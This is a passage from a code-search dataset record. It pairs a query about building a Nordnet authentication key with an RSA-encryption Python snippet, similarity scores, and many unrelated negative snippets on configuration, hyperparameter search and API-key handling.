os.path.join(\n args.root, config_dir, split, seed_str,\n )\n print('save_dir',save_dir)\n os.makedirs(save_dir, exist_ok=True)\n save_file = os.path.join(save_dir, prefix + '.yaml')\n print('save_file' , save_file)\n\n configs = load_yaml_file(config)\n print('reading from this config file ',config)\n configs['_BASE_'] = base_cfg\n configs['DATASETS']['TRAIN'] = make_tuple(configs['DATASETS']['TRAIN'])\n configs['DATASETS']['TEST'] = make_tuple(configs['DATASETS']['TEST'])\n if args.coco and not args.novel_finetune:\n ckpt_path = os.path.join(output_dir, prefix, 'model_reset_combine.pth')\n if not os.path.exists(ckpt_path):\n src2 = os.path.join(\n output_dir, 'faster_rcnn_R_101_FPN_ft_novel_{}shot{}'.format(\n shot, args.suffix),\n 'model_final.pth',\n )\n if not os.path.exists(src2):\n print('Novel weights do not exist. Please run with the ' + \\\n '--novel-finetune flag first.')\n assert False\n combine_cmd = 'python tools/ckpt_surgery.py --coco --method ' + \\\n 'combine --src1 checkpoints/coco/faster_rcnn/faster_rcnn' + \\\n '_R_101_FPN_base/model_final.pth --src2 {}'.format(src2) + \\\n ' --save-dir {}'.format(os.path.join(output_dir, prefix))\n run_cmd(combine_cmd)\n assert os.path.exists(ckpt_path)\n configs['MODEL']['WEIGHTS'] = ckpt_path\n elif not args.coco:\n configs['MODEL']['WEIGHTS'] = configs['MODEL']['WEIGHTS'].replace(\n 'base1', 'base' + str(args.split))\n for dset in ['TRAIN', 'TEST']:\n configs['DATASETS'][dset] = (\n configs['DATASETS'][dset][0].replace(\n temp_mode, 'all' + str(args.split)),\n )\n configs['DATASETS']['TRAIN'] = (\n configs['DATASETS']['TRAIN'][0].replace(\n '1shot', str(shot) + 'shot'\n ) + ('_{}'.format(seed_str) if seed_str != '' else ''),\n )\n configs['SOLVER']['BASE_LR'] = args.lr\n configs['SOLVER']['MAX_ITER'] = ITERS[shot][1]\n configs['SOLVER']['STEPS'] = (ITERS[shot][0],)\n configs['SOLVER']['CHECKPOINT_PERIOD'] = ITERS[shot][1] // args.ckpt_freq\n configs['OUTPUT_DIR'] = os.path.join(output_dir, prefix)\n\n if seed != 0:\n with open(save_file, 'w') as fp:\n yaml.dump(configs, fp)\n\n return save_file, configs", "def run_config_space(pc, learner_config_space, get_val_results, baseline=False):\n\n # load data\n data = prepare_data(pc, dim=learner_config_space.dim)\n\n if baseline:\n do_baseline(data)\n return\n\n # search for best parameters on the validation set\n mse_scores, val_results = get_val_results(data, learner_config_space, pc)\n\n # select the best config according to validation set results\n best_config, val_result = get_best_config(learner_config_space, pc,\n mse_scores, val_results)\n\n yhat_is = data.revert(val_result.yhat_is, \"train\", True)\n yhat_val = data.revert(val_result.yhat_oos, \"val\", True)\n\n yhat_is_list = [data.revert(x, \"train\", True) for x in val_result.yhat_is_list]\n yhat_val_list = [data.revert(x, \"val\", True) for x in val_result.yhat_oos_list]\n\n LOGGER.info(\"Best config %s:\\t%.3f\\t%.3f\\t%.3f\\t%.3f\\t%.3f\\t%.3f\\t%s\" % (\n best_config.vals,\n val_result.train_mse, val_result.test_mse,\n val_result.train_mae, val_result.test_mae,\n val_result.train_mape, val_result.test_mape,\n yhat_val))\n\n LOGGER.info(\"Informative features:\")\n for k, v in val_result.feature_scores[:5]:\n LOGGER.info(\"%s: %.3f\" % (k, v))\n\n return {\n 'date': best_config.datetime,\n 'preproc_config': pc,\n 'learner': best_config.learner,\n 'best_learner_config': best_config.vals,\n 'mse': {\n 'train': {\n 'mean': val_result.train_mse,\n 'std': val_result.train_mse_std,\n 'obs': val_result.train_mse_list\n },\n 'val': 
{\n 'mean': val_result.test_mse,\n 'std': val_result.test_mse_std,\n 'obs': val_result.test_mse_list,\n },\n },\n 'mae': {\n 'train': {\n 'mean': val_result.train_mae,\n 'std': val_result.train_mae_std,\n 'obs': val_result.train_mae_list\n },\n 'val': {\n 'mean': val_result.test_mae,\n 'std': val_result.test_mae_std,\n 'obs': val_result.test_mae_list,\n },\n },\n 'mape': {\n 'train': {\n 'mean': val_result.train_mape,\n 'std': val_result.train_mape_std,\n 'obs': val_result.train_mape_list\n },\n 'val': {\n 'mean': val_result.test_mape,\n 'std': val_result.test_mape_std,\n 'obs': val_result.test_mape_list,\n }\n },\n 'yhat_is': {\n 'mean': yhat_is,\n 'obs': yhat_is_list\n },\n 'yhat_val': {\n 'mean': yhat_val,\n 'obs': yhat_val_list\n },\n 'validation_runs': [{'config': dict(x),\n 'scores': {'mse': v.test_mse,\n 'mae': v.test_mae,\n 'mape': v.test_mape}}\n for x, v in val_results.items()],\n 'feature_scores': val_result.feature_scores,\n 'permuted_scores': val_result.permuted_scores\n }", "def make_tree(self):\n\n # list [station_name]\n visited = []\n\n # creates empty station object for each station and adds coordinates\n for station in self.stations:\n new_station = Station(station)\n coordinates = self.stations[station].get_coordinates()\n new_station.add_coordinates(coordinates[0], coordinates[1])\n\n # saves station in prims_tree dictionary\n self.prims_tree[station] = new_station\n\n # choose random beginning station\n random_station = random.choice(list(self.stations.values()))\n\n # sort station connections and retrieve shortest\n station_connections = random_station.get_connections()\n station_connections = sorted(station_connections.items(), key=operator.itemgetter(1))\n new_connection = station_connections.pop(0)\n new_station = new_connection[0]\n new_time = new_connection[1]\n\n # retrieve empty stations from prims_tree dictionary\n first_station = self.prims_tree[random_station.name]\n new_station = self.prims_tree[new_station.name]\n\n # add shortest connection to stations\n first_station.add_connection(new_station, new_time)\n new_station.add_connection(first_station, new_time)\n\n # add stations to visited\n visited.append(first_station.name)\n visited.append(new_station.name)\n\n # runs until all stations are visited\n while len(visited) is not len(self.prims_tree):\n # starts as arbitrarily high number\n min_connection_time = 9999\n\n # get connections of visited stations\n for station in visited:\n connections = self.stations[station].get_connections()\n\n # get time of connections\n for connection in connections:\n connection_time = connections[connection]\n\n # save smallest connection if time is smallest and station is not visited\n if connection.name not in visited and connection_time < min_connection_time:\n smallest_connection = self.prims_tree[connection.name]\n smallest_connection_station = self.prims_tree[station]\n min_connection_time = connection_time\n else:\n continue\n\n # add smallest connection to station in prims_tree dictionary\n smallest_connection_station.add_connection(smallest_connection, min_connection_time)\n smallest_connection.add_connection(smallest_connection_station, min_connection_time)\n\n # add new connection to visited list\n visited.append(smallest_connection.name)\n\n return self.prims_tree", "def get_configspace():\n cs = CS.ConfigurationSpace()\n\n \n\n # Learning rate hyperparameter\n lr = CSH.UniformFloatHyperparameter('lr', lower=1e-6, upper=1e-1, default_value='1e-2', log=True)\n\n \n\n # Stochastic gradient descent momentum as 
parameter.\n sgd_momentum = CSH.UniformFloatHyperparameter('sgd_momentum', lower=0.0, upper=0.99, default_value=0.9, log=False)\n\n cs.add_hyperparameters([lr, sgd_momentum])\n \n # Optimizer hyperparameters.\n #optimizer = CSH.CategoricalHyperparameter('optimizer', ['Adam', 'SGD'])\n #cs.add_hyperparameters([optimizer])\n \n # Only add the sgd_momentum hyperparameter if the optimizer is stochastic gradient descent. Otherwise, it doesn't make sense.\n #cond = CS.EqualsCondition(sgd_momentum, optimizer, 'SGD')\n #cs.add_condition(cond)\n\n ''' The below is commented out because we're not fiddling with architecture in this optimization.'''\n #num_new_fc_layers = CSH.UniformIntegerHyperparameter('num_new_fc_layers', lower=0, upper=3, default_value=0, log=False)\n #num_els_new_1 = CSH.UniformIntegerHyperparameter('num_els_new_1', lower=128, upper=4096, default_value = 1000, log=True)\n #num_els_new_2 = CSH.UniformIntegerHyperparameter('num_els_new_2', lower=128, upper=4096, default_value = 1000, log=True)\n #num_els_new_3 = CSH.UniformIntegerHyperparameter('num_els_new_3', lower=128, upper=4096, default_value = 1000, log=True)\n\n #freeze0_old = CSH.UniformIntegerHyperparameter('freeze0_cat', lower = 0, upper = 1, default_value = 1, log=False)\n #freeze1_old = CSH.UniformIntegerHyperparameter('freeze1_cat', lower=0, upper=1, default_value=1, log=False)\n\n #cs.add_hyperparameters([num_new_fc_layers, num_els_new_1, num_els_new_2, num_els_new_3, freeze0_old, freeze1_old, batchsize])\n\n dropout_rate = CSH.UniformFloatHyperparameter('dropout_rate', lower=0.0, upper=0.9, default_value=0.5, log=False)\n\n cs.add_hyperparameters([dropout_rate])\n\n return cs", "def suggest_config(parameters, trial):\n config = {}\n for c_name, c_type, c_vals in parameters:\n if c_type == \"choice\":\n config[c_name] = trial.suggest_categorical(c_name, c_vals)\n elif c_type == \"int\":\n config[c_name] = trial.suggest_int(c_name, c_vals[0], c_vals[1], step=c_vals[2] if len(c_vals) > 2 else 1, log=c_vals[3] if len(c_vals) > 3 else False) \n elif c_type == \"float\":\n config[c_name] = trial.suggest_float(c_name, c_vals[0], c_vals[1], step=c_vals[2] if len(c_vals) > 2 else 1, log=c_vals[3] if len(c_vals) > 3 else False) \n elif c_type == \"fixed\":\n config[c_name] = c_vals\n else:\n raise ValueError(\"Parameter type '%s' was not implemented!\" % c_type)\n return config" ]
[ "0.7005242", "0.66232514", "0.6464399", "0.62459195", "0.6219636", "0.6025062", "0.5821818", "0.58028185", "0.56950855", "0.5568496", "0.5530859", "0.5526991", "0.55262834", "0.5522291", "0.547059", "0.5425894", "0.54113275", "0.5394614", "0.5392455", "0.5378019", "0.53733134", "0.5367146", "0.5268899", "0.52353597", "0.5216201", "0.52160203", "0.5210259", "0.5201441", "0.5195899", "0.51886064", "0.51710504", "0.51304", "0.5119616", "0.5107861", "0.5101871", "0.50957566", "0.5090436", "0.50832576", "0.5072423", "0.507175", "0.507079", "0.50623393", "0.5043957", "0.5043856", "0.50409037", "0.50383687", "0.5002119", "0.49989375", "0.4985671", "0.49664885", "0.49662915", "0.4961965", "0.49543333", "0.49430555", "0.49389988", "0.49284124", "0.49264443", "0.49233118", "0.49121568", "0.49091417", "0.48973858", "0.4897369", "0.48909193", "0.48890173", "0.48885465", "0.48881823", "0.48860124", "0.4884193", "0.48810285", "0.48729274", "0.4871689", "0.4870553", "0.48677617", "0.48673135", "0.48608696", "0.48587158", "0.4855237", "0.4853168", "0.48507416", "0.48494846", "0.48430482", "0.48421738", "0.48399064", "0.4839358", "0.48371452", "0.48363057", "0.48342818", "0.48320743", "0.48303333", "0.48291057", "0.48240927", "0.48177618", "0.48114377", "0.48093864", "0.4807966", "0.48071584", "0.4804086", "0.47986066", "0.47914287", "0.47861388" ]
0.71698874
0
Makes the key for authentication according to the specification on Nordnets page
def make_hash(self): timestamp = str(int(round(time.time()*1000))) auth = b64encode(config.username) + ':' \ + b64encode(config.password) + ':' \ + b64encode(timestamp) rsa = RSA.load_pub_key(config.public_key) encrypted_auth = rsa.public_encrypt(auth, RSA.pkcs1_padding) key = b64encode(encrypted_auth) return key
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def create_key ():", "def private_key(self):", "def public_key(self):", "def private_key():\n return \"Toholampi summer festival 2017 has the most harcore rock bands\"", "def authenticator():", "def getAuthKey(self):\r\n auth_key = 'Que despierte la Red'\r\n assert len(auth_key) == self.AUTH_KEY_LEN\r\n return auth_key", "def _get_auth_string(self):", "def load_key():", "def authenticate(self,keys=None):\n\n # if we have just been handed keys, stash them in self\n if keys:\n self.appID = keys['appID']\n self.mac_key_id = keys['mac_key_id']\n self.mac_key = keys['mac_key']\n debugMain('authenticate: ok, thanks for supplying keys')\n return keys\n\n # if we already have keys, we don't need to do anything.\n if self.isAuthenticated():\n debugMain('authenticate: we already have keys! doing nothing.')\n return\n\n # first, register with the server to get temp keys:\n # self.appID and self.mac_*\n # this also makes a new self.session which uses MAC authentication\n self._register()\n\n debugMain('authenticate: converting temp keys into permanent keys')\n\n # send user to the tent.is url to grant access\n # we will get the \"code\" in response\n self.state = randomString()\n params = {\n 'client_id': self.appID,\n 'redirect_uri': self.oauthCallbackUrl,\n 'state': self.state,\n 'scope': ','.join(self.scopes.keys()),\n 'tent_profile_info_types': 'all',\n 'tent_post_types': 'all',\n }\n if self.postNotificationUrl:\n params['tent_notification_url'] = self.postNotificationUrl\n requestUrl = self.apiRootUrls[0] + '/oauth/authorize'\n urlWithParams = requestUrl + '?' + urlencode(params)\n\n print '---------------------------------------------------------\\\\'\n print\n print 'Opening web browser so you can grant access on your tent server.'\n print\n print 'URL: %s'%urlWithParams\n print\n print 'After you grant access, your browser will be redirected to'\n print 'a nonexistant page. Look in the url and find the \"code\"'\n print 'parameter. 
Paste it here:'\n print\n print 'Example:'\n print 'http://zzzzexample.com/oauthcallback?code=15673b7718651a4dd53dc7defc88759e&state=ahyKV...'\n print ' ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^'\n print\n webbrowser.open(urlWithParams)\n code = raw_input('> ')\n print\n print '---------------------------------------------------------/'\n\n # trade the code for a permanent key\n # first make the auth headers using the credentials from the registration step\n resource = '/apps/%s/authorizations'%self.appID\n jsonPayload = {'code':code, 'token_type':'mac'}\n\n # then construct and send the request\n debugDetail()\n headers = dict(DEFAULT_HEADERS)\n headers['Content-Type'] = 'application/vnd.tent.v0+json'\n requestUrl = self.apiRootUrls[0] + resource\n debugRequest('posting to: %s'%requestUrl)\n r = retry(self.session.post, requestUrl, data=json.dumps(jsonPayload), headers=headers)\n\n # display our request\n debugDetail('request headers:')\n debugJson(r.request.headers)\n debugDetail('request data:')\n debugDetail(r.request.data)\n\n # then get the response\n debugDetail()\n debugDetail('response headers:')\n debugJson(r.headers)\n debugDetail('response text:')\n debugRaw(r.text)\n if not r.json:\n debugDetail()\n debugError('auth failed.')\n return\n debugJson(r.json)\n\n # now we have permanent keys\n self.mac_key_id = r.json['access_token'].encode('utf-8')\n self.mac_key = r.json['mac_key'].encode('utf-8')\n debugDetail('final mac key id: %s'%self.mac_key_id)\n debugDetail('final mac key: %s'%self.mac_key)\n\n # return the keys\n return {\n 'appID': self.appID,\n 'mac_key_id': self.mac_key_id,\n 'mac_key': self.mac_key,\n }", "def key():", "def _GetKeyString(self):", "def _GetKeyString(self):", "def __init__(self, key):\r\n self._key = key\r\n self._authenticated = Deferred()", "def getAuthKey( self ):\n d = {\n \"frob\" : FLICKR[ \"frob\" ],\n \"perms\" : \"delete\"\n }\n sig = self.signCall( d )\n url = self.urlGen( api.auth, d, sig )\n ans = \"\"\n try:\n webbrowser.open( url )\n print(\"Copy-paste following URL into a web browser and follow instructions:\")\n print(url)\n ans = raw_input(\"Have you authenticated this application? 
(Y/N): \")\n except:\n print(str(sys.exc_info()))\n if ( ans.lower() == \"n\" ):\n print(\"You need to allow this program to access your Flickr site.\")\n print(\"Copy-paste following URL into a web browser and follow instructions:\")\n print(url)\n print(\"After you have allowed access restart uploadr.py\")\n sys.exit()", "def __init__(self, basekey=\"\"):\n self.basekey = basekey", "def main():\n key, plain = get_key_plain()\n encode(key, plain)", "def test_create_digital_access_key(self):\n pass", "def test_create_api_key(self):\n pass", "def auth_token(self):", "def pass_key(self) -> str:\n return pulumi.get(self, \"pass_key\")", "def download_key():\n data = check_args(('cloudProvider', ))\n provider = jobs.init_provider(data, True)\n key = encrypt_key(provider.get_key(), data['username'])\n return make_response(keyName=provider.keyname, key=key)", "def authenticate(self):\n expires = int(time.time())\n method = \"GET\"\n path = \"/realtime\"\n msg = method + path + str(expires)\n signature = hmac.new(\n self.secret, msg.encode(), digestmod=hashlib.sha256\n ).hexdigest()\n\n req = {\"op\": \"authKey\", \"args\": [self.key, expires, signature]}\n self.send_packet(req)", "def key():\n pass", "def key():\n pass", "def test_generate_key(self): \n k = Key().generate()\n self.assertRegex(k, \"[a-zA-Z0-9+\\/]+={0,2}\")", "def MakeKey(self, string, string_1, string_2):\n ...", "async def gen_auth_string():\n return f\"{ASTERISK_USER}:{ASTERISK_PASS}\"", "def generate_key(self):\n\n self.key = Fernet.generate_key()\n self.cryptor = Fernet(self.key)", "def __init__(self, key, initial_prng):\n self.cipher = key\n self.prng = initial_prng\n self.nonce = None", "def generate_access_key(self):\n\t\tfrom app import app\n\t\ts = JSONWebSignatureSerializer(app.config['SECRET_KEY'])\n\t\taccess_key = s.dumps({'username': self.username}) \n\t\tself.access_key = access_key", "def keygen():\n pk, pub = generate_signing_key()\n t = PrettyTable([\"Private (install on your witness node)\",\n \"Public (publish with 'conductor enable' command)\"])\n t.align = \"l\"\n t.add_row([pk, pub])\n\n output(t, '')", "def set_AuthenticationKey(self, value):\n super(AddressValidationInputSet, self)._set_input('AuthenticationKey', value)", "def post_key(self):\n # print(self.key)\n #Sending the key to the attacker.\n s.send(bytes(\"K\\n{}\".format(str(self.key,'utf-8')),'utf-8'))", "def set_key(vars): #vars=[0]num,[1]rWord,[2]rString\r\n nonlocal key\r\n nonlocal x\r\n x=vars[0]\r\n if (vars[1]=='yes'):\r\n key['reverse_word']=True\r\n if (vars[2]=='yes'):\r\n key['reverse_string']=True\r\n if (x<-26 or x>26):\r\n x=x%26 #makes x to be in range\r\n if (x==0):\r\n x=random.randrange(-26,26) #random number\r\n for i in range (97,123): #26 ABC letters, ASCII value of 'a' is 97 97+26=123\r\n if(i+x>122):\r\n key[chr(i)]=chr(i-25+x)\r\n elif (i+x<97):\r\n key[chr(i)]=chr(i+26+x)\r\n else:\r\n key[chr(i)]=chr(i+x)\r\n print(\"done\")", "def get_key(self, user, api_key):\n return True", "def ns_authentication(conn):\n # get RSA key of Bob for decrypting\n rsa_key = rsa.import_key(\"RsaKey.asc\")\n\n # A -- {N_A, A}(K_PB) --> B\n request = rsa.decrypt(rsa_key, conn.recv(1024))\n client_nonce, client_name = request.split(',')\n print(\"Bob: recieved nonce {} from client {}\".format(client_nonce, client_name))\n\n # get client's public key\n subprocess.Popen([sys.executable, \"..\\\\pks\\\\pks.py\", \"--extract\"])\n pks_address = (PKS_HOST, PKS_PORT)\n client_pkey = ns.get_public_key(pks_address, client_name, NAME, rsa_key)\n 
client_pkey = rsa.import_key(client_pkey)\n\n # Lowe's fix: A <-- {N_A, N_B, B} -- B\n bob_nonce = ns.generate_nonce()\n response = \"{},{},{}\".format(client_nonce, bob_nonce, NAME)\n response = rsa.encrypt(client_pkey, response)\n conn.sendall(response)\n print(\"Bob: sent nonces {}, {} to {}\".format(client_nonce, bob_nonce, client_name))\n\n # A -- {K, N_B} --> B\n request = conn.recv(1024)\n if request.isdigit() and int(request) == RESP_DENIED:\n return print(\"Bob: request to shutdown recieved, shutting down...\")\n request = rsa.decrypt(rsa_key, request)\n ssn_key, bob_resp_nonce = request.split(',')\n ssn_key = bytes(ssn_key, \"utf-8\")\n bob_resp_nonce = int(bob_resp_nonce)\n print(\"Bob: recieved session key {} and nonce {}\".format(ssn_key, bob_resp_nonce))\n\n # check if client did actually recieve Bob's nonce\n if bob_resp_nonce == bob_nonce:\n response = bytes(str(RESP_VERIFIED), \"utf-8\")\n conn.sendall(response)\n print(\"Bob: connection verified!\")\n return ssn_key, client_name\n else:\n print(\"Bob: nonces {} and {} do not match!\".format(bob_nonce, bob_resp_nonce))", "def authenticate( self ):\n\n print(\"Getting new token\")\n self.getFrob()\n self.getAuthKey()\n self.getToken()\n self.cacheToken()", "def key(key):\n return key", "def auth():\n pass", "def auth():\n pass", "def ask_keys(self, update, context):\r\n update.message.reply_text('Введите новый ключ')\r\n return self.LISTEN", "def __init__(self, server, key):\n self.server = server\n self.key = key", "def CR_authentication():\n \n # create a random 10 character string\n choices = string.letters + string.digits + string.punctuation;\n randomString = ''.join(random.choice(choices) for i in range(10))\n session['challenge'] = randomString\n \n return Response('Access failed.', 401, {'WWW-Authenticate': str.format('Basic realm=\\\"Protected iStreet event data; Challenge: {0}\\\"', randomString)})", "def recipient_public_key(self):", "def __init__(self, key_id: str, user: str, password: str):\n\n self.key_id = key_id\n self.user = user\n self.password = password\n self.con_strategy = \"unknown\"\n self.session = requests.Session()\n self.session.auth = (user, password)\n self.__fields = None\n if self.key_id == \"localhost\":\n self.local_ip_list = \"127.0.0.1\"\n self.local_ip = \"127.0.0.1\"\n self.port = \"52199\"\n self.con_strategy = \"local\"", "def gen_tlsauth_key():\n cmd = ['/usr/sbin/openvpn', '--genkey', 'secret', 'ta.tmp']\n ret = subprocess.check_call(cmd)\n with open('ta.tmp') as key:\n key = key.read()\n os.remove('ta.tmp')\n return key", "def __init__(self, key=None):\n\n self.key = key\n self.cryptor = None\n self.file_ext_targets = ['txt']", "def __init__(self, uid, key, initial_prng):\n self.uid = uid\n self.key = key\n Crypto1.__init__(self, key, initial_prng)", "def create_apikey(self, username, api_key):\r\n return 'ApiKey %s:%s' % (username, api_key)", "def genKeys():\r\n (pub, priv) = rsa.newkeys(256)\r\n context = {\r\n 'pub': pub,\r\n 'priv': priv\r\n }\r\n return context", "def API_KEY(self):\n return 13", "def auth(self):\n\n self.name = self.config[\"sname\"]\n self.numeric = self.config[\"numeric\"]\n\n passwd = self.config[\"password\"]\n\n now = int(time.time())\n\n self.send_line(\"PASS :%s\" % passwd)\n self.send_line(\"SERVER %s 1 %d %d J10 %s]]] 0 :Gravelir Services\" %\\\n (self.name, now, now, self.numeric))", "def __init__(self, accesskey):\n self.accesskey = accesskey\n self.UpdateFromServer()", "def get_request_authentication():\n return os.urandom(16)", "def 
add_key(mu_key):\n params['key'] = mu_key", "def api_key_set(self, api_key):\n self.request('/v1.1/auth_key', 'POST', body={'auth_key': api_key})", "def API_KEY(self):\n return 2", "def generate_keystream(self):", "def get_key_input():\n return get_input(message='Please enter your master key:',\n secure=True, check_timer=False)", "def generate_api_key(key_length: int = settings.api_app_auth_key_length) -> str:\n return secrets.token_urlsafe(64)[:key_length]", "def authenticate(self):\n # Receive public key from server\n message = self.receive()\n # Initialize RSA with public key of server\n self.secret.init_rsa(public_key=message)\n # Initialize AES\n self.secret.init_aes()\n # Encrypt AES key & nonce\n payload = self.secret.encrypt_rsa(self.secret.export_aes_key())\n # Send encrypted AES key & nonce pair to server\n self.send(payload)\n self.secret.ready = True", "def make_external_key(self, data):\n return data['key']", "def __init__(self):\n self._keypair = RSA.generate(2048)\n self.public_key = self._keypair.publickey().exportKey()", "def upload_key():\n data = check_args(('cloudProvider', 'key'))\n provider = jobs.init_provider(data, True)\n key = decrypt_key(data['key'], data['username'])\n provider.save_key(key)\n return make_response()", "def test_api_key(self):\n self.assertEqual(self.route4me.key, '11111111111111111111111111111111')", "def key_id(cls, url: str):\r\n ...", "def generate_key():\n return get_token_generator().generate_token()", "def _init_keys(self):\n\n basic_constraints = crypto.X509Extension('basicConstraints'.encode('ascii'), True,\n 'CA:TRUE, pathlen:0'.encode('ascii'))\n serial = self._get_serial()\n pkey = self._create_pkey(self.commonname, serial)\n self._create_cert(pkey, self.commonname, serial, [basic_constraints], expire=30*365)", "def newKeyGenerate():\n generate()\n return '', 204", "def setup_keys():\n if os.path.isfile(\"key.txt\"):\n message = \"Key already generated\"\n else:\n secret = secrets.token_urlsafe(64)\n message = \"Secret generated and saved in key.txt\"\n with open(\"key.txt\", \"w\") as fd:\n fd.write(secret)\n return json.dumps({'message': message})", "def gen_keys():", "def email_key(self):\r\n url = '{0}/emailKey/generate'.format(self.get_url())\r\n request = http.Request('POST', url)\r\n return request, parsers.parse_json", "def create_keys(self):\n crypto_tool = CryptoTools()\n # creating RSA keys for the signer user\n public_key, private_key = crypto_tool.create_key_with_entropy()\n self.priv_key = crypto_tool.get_pem_format(private_key).decode(\"utf-8\")\n self.pub_key = crypto_tool.get_pem_format(public_key).decode(\"utf-8\")", "def auth_key(event):\n headers = event.get('header')\n if not headers:\n raise RestException(\"Headers are missing\", 400)\n auth = headers.get('Authorization')\n if not auth:\n raise RestException('Header Authorization is missing', 400)\n if not auth.lower().startswith('bearer '):\n raise RestException(\"Authorization missing Bearer keyword\", 400)\n auth = auth.replace('Bearer ', '')\n auth = auth.replace('bearer ', '')\n return auth.strip()", "def gen_key():\n key = os.urandom(32) # 256 bit\n return base64.b64encode(key).rstrip('=') # strip off padding", "def __init__(self, cust_key):\n\n # Call the base class constructor to pass in the base URL\n super().__init__(base_url=\"https://s-platform.api.opendns.com/1.0\")\n\n # Store the API key for use as a query parameters later\n self.auth_params = {\"customerKey\": cust_key}", "def gen_api_key():\r\n m = hashlib.sha256()\r\n 
m.update(get_random_word(12))\r\n return unicode(m.hexdigest()[:12])", "def _get_api_key(self):\n self.api.apikey = self.api.action.user_show(id=self.username)['apikey']", "def get_auth(self):\n return {'method': yeti_config.core.auth}", "def __init__(self, key):\n self.key = key", "def gen_key(app):\n\tos.system('lxc-attach -n %s -- ssh-keygen -t rsa -N \"\" -f key' % app)", "def generate_keys(self):\n\n # TODO: Store keys encrypted\n rsa1 = RsaPrivateKey.Generate()\n self.sign_private = str(rsa1)\n self.sign_public = str(rsa1.public_key)\n\n rsa2 = RsaPrivateKey.Generate()\n self.crypt_private = str(rsa2)\n self.crypt_public = str(rsa2.public_key)", "def get_key_id(self):", "def __init__(self, alg, key):\n self.alg = alg\n self.key = key", "def _set_authenticator(self):\n pass", "def test_aws_service_api_keypair_generate_post(self):\n pass", "def _newKey(self, key):\n pass", "def request_idkey(self):\r\n if self.use_http():\r\n self.enqueue_http_request(\"money/idkey\", {}, \"idkey\")\r\n else:\r\n self.send_signed_call(\"private/idkey\", {}, \"idkey\")", "def api_key(request):\r\n user_acct = request.user\r\n return _api_response(request, {\r\n 'api_key': user_acct.api_key,\r\n 'username': user_acct.username\r\n })", "def set_tokenterminal_key(\n key: str, persist: bool = False, show_output: bool = False\n) -> str:\n handle_credential(\"API_TOKEN_TERMINAL_KEY\", key, persist)\n return check_tokenterminal_key(show_output)", "def accesskey(request):\n return request.config.getoption(\"--accesskey\")", "def __init__(self, key):\n self._key = key\n self.log = logging.getLogger(__name__)\n self.base_url = \"https://osu.ppy.sh/api/{}?k=\" + self._key", "def _authenticate(self):\n\t\tfrom getpass import getpass\n\t\tpassword = getpass()\n\t\tself.msg('nickserv', 'identify %s' % password)", "def test_add_api_key_to_org(self):\n pass", "def model_endpoint():\n if request.method == 'POST':\n # Build a new Kiosk login\n data: object = {\"Name\": \"Fred\", \"authkey\": \"Im a base64 encoded authorization key\"}\n return jsonify(data.__dict__)\n else:\n return \"\"", "def start(self):\n self.delay(50)\n DEBUG = GLOBAL_DEBUG and True\n if DEBUG: print \"start()\"\n\n # Get enckey_idx\n enckey_idx = struct.unpack(\"<L\", self.magic_page[OFF_ENCKEY_IDX:OFF_ENCKEY_IDX+4])[0]\n enckey_idx_actual = ((enckey_idx % SZ_PAGE) & ~0xF) & 0xFFFFFFFF;\n if DEBUG: print \"enckey_idx = 0x%08x; enckey_idx_actual = 0x%08x\" % (enckey_idx, enckey_idx_actual)\n\n # Get the enckey: a 4-lengthed array of uint32_ts\n self.state[\"enckey\"] = self.magic_page[enckey_idx_actual:enckey_idx_actual+16]\n # NOTE: this doesn't take LE into account\n if DEBUG: \n print \"enckey_idx_actual = 0x%02x, enckey = %s\" % (enckey_idx_actual, self.state[\"enckey\"])\n msg = \"0x\"\n for byte in self.state[\"enckey\"]:\n msg += \"%02x\" % struct.unpack(\"B\", byte)\n print \"enckey (hex) = %s\" % msg\n\n # Get auth_token_idx\n auth_token_idx = struct.unpack(\"<L\", self.magic_page[OFF_AUTH_TOKEN_IDX:OFF_AUTH_TOKEN_IDX+4])[0]\n auth_token_idx_actual = ((auth_token_idx % SZ_PAGE) & ~0xF) & 0xFFFFFFFF;\n if DEBUG: print \"auth_token_idx = 0x%08x; auth_token_idx_actual = 0x%08x\" % (auth_token_idx, auth_token_idx_actual)\n\n # Get the auth_token: a single uin32_t\n self.state[\"auth_token\"] = self.magic_page[auth_token_idx_actual:auth_token_idx_actual+4]\n # NOTE: this doesn't take LE into account\n if DEBUG: \n print \"auth_token_idx_actual = 0x%02x, auth_token = %s\" % (auth_token_idx_actual, self.state[\"auth_token\"])\n msg = \"0x\"\n for 
byte in self.state[\"auth_token\"]:\n msg += \"%02x\" % struct.unpack(\"B\", byte)\n print \"auth_token (hex) = %s\" % msg\n\n # Initialize PRNG buf (static)\n self.state[\"prng_buf\"] = struct.pack(\"<BBBBBBBB\", \n 0x00, 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77 );\n if DEBUG: \n print 'self.state[\"prng_buf\"] = %s' % self.state[\"prng_buf\"] \n msg = \"0x\"\n for byte in self.state[\"prng_buf\"]:\n msg += \"%02x\" % struct.unpack(\"B\", byte)\n print 'self.state[\"prng_buf\"] = %s' % msg\n \n # Get PRNG key (based on flag page)\n self.state[\"prng_key\"] = \"\".join([ \n self.magic_page[ 2], self.magic_page[ 3], \n self.magic_page[ 5], self.magic_page[ 7],\n self.magic_page[11], self.magic_page[13],\n self.magic_page[17], self.magic_page[19],\n self.magic_page[23], self.magic_page[29],\n self.magic_page[31], self.magic_page[37],\n self.magic_page[41], self.magic_page[43],\n self.magic_page[53], self.magic_page[59] ] )\n if DEBUG: \n print 'self.state[\"prng_key\"] = %s' % self.state[\"prng_key\"] \n msg = \"0x\"\n for byte in self.state[\"prng_key\"]:\n msg += \"%02x\" % struct.unpack(\"B\", byte)\n print 'self.state[\"prng_key\"] = %s' % msg\n\n # We start with an empty PRNG cache.\n self.state[\"prng_bytes_remaining\"] = 0\n\n # Toggle for expected destination of messages.\n self.state[\"expected_dst\"] = DST_CB1", "def _create_fernet_key(self) -> str:\n\n client = boto3.client(\"ssm\", endpoint_url=os.environ.get(\"AWS_ENDPOINT\"))\n\n try:\n response = client.get_parameter(Name=self.object_name, WithDecryption=True)\n return response[\"Parameter\"][\"Value\"]\n except client.exceptions.ParameterNotFound:\n return Fernet.generate_key().decode()", "def __init__ (self, key = None, password = None):\n self.KEY = key or 'testapi'\n self.PASSWORD = password or 'testpass'\n self.URL = 'https://api.internet.bs/'\n # assume we use test credential if none were provided\n if not key or not password:\n self.URL = 'https://testapi.internet.bs'", "def API_KEY(self):\n raise NotImplementedError()", "def GetRootKey(self):", "def genKey(self, otherKey):\n self.sharedSecret = self.genSecret(self.privateKey, otherKey)\n 